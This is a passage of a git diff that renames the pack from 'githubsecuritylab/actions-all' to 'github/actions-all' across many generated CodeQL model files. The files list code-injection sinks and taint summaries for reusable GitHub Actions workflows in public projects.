a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index ff0695c0ef25..43e993417170 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9576ce3892a9..cc5fb5c8d57a 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index b78d61184114..64ca7805d901 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index cbe56806056b..eab60f252385 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 391bbc6aacb9..fc91813e01b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index f8b490726da9..253c82f4bef9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 889499eea3d3..eb1b3df774d9 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 2dce19050ed7..3c6e1aaf658e 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] @@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index c80f8e732b64..3f66f2878303 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b85a11d81f2e..b45eabdf202b 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index f8102400cc72..76bb69800a9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 1af7b8322035..9af37394143f 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index c0688a4a5e06..9d0113eb8ece 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 4e91308a0049..90ad3c0f9a18 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index bc42c619599d..e07d783ae53d 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 68925b294bb6..3d698b0a84b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index c3ff42ed6049..364bd19139e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 964436f33ca8..85d150cf11c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 995940550e19..612a114d79cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 93653f07819e..86267e5a9217 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 961070778cfd..31d0192f3fba 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 9f1cc82523cc..5116c943f690 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 68babc09b6a1..85cb45df8951 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index f4271e5424b1..4167f4bb982a 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index f20f7997d3c4..04b9325cecd9 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index da5617fd144d..60b966d98a4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index 78821b4dad3c..bbca585931c5 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index f0c9290ca22e..a0b7c4189672 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 21d236989316..663826781e7a 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index ac38cac602d5..c0b8992a6786 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a9f87db955ea..a7069a8fa4fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 99c706b0c28b..3ec3c008301a 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f8d0172d684b..f4c09189ba64 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 5afda471f8b7..46b715358e06 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4e5ca50ccec1..ca728bfced25 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 02801615bd51..c31b5c8fe0c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index d808d612857f..e53c0a2780b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index e543dc8b7f34..2c904674125a 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index 891d902f4709..cff10b709e9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 334d64dfbece..31e4dbbf7ab6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 2c600cd7f7d3..5aca8a7070da 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index cc6c4e620e60..179c882eba19 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index efbf050ddc96..a702bdd47843 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 9860bd3ab92f..105a5b49f3dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index c160c29f6f63..4e4aa9f79861 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 910715eece07..4272f3376ce1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] @@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index f04e67670d3b..4752bce29b9f 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 3d5fa057987c..e493955ca4cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", 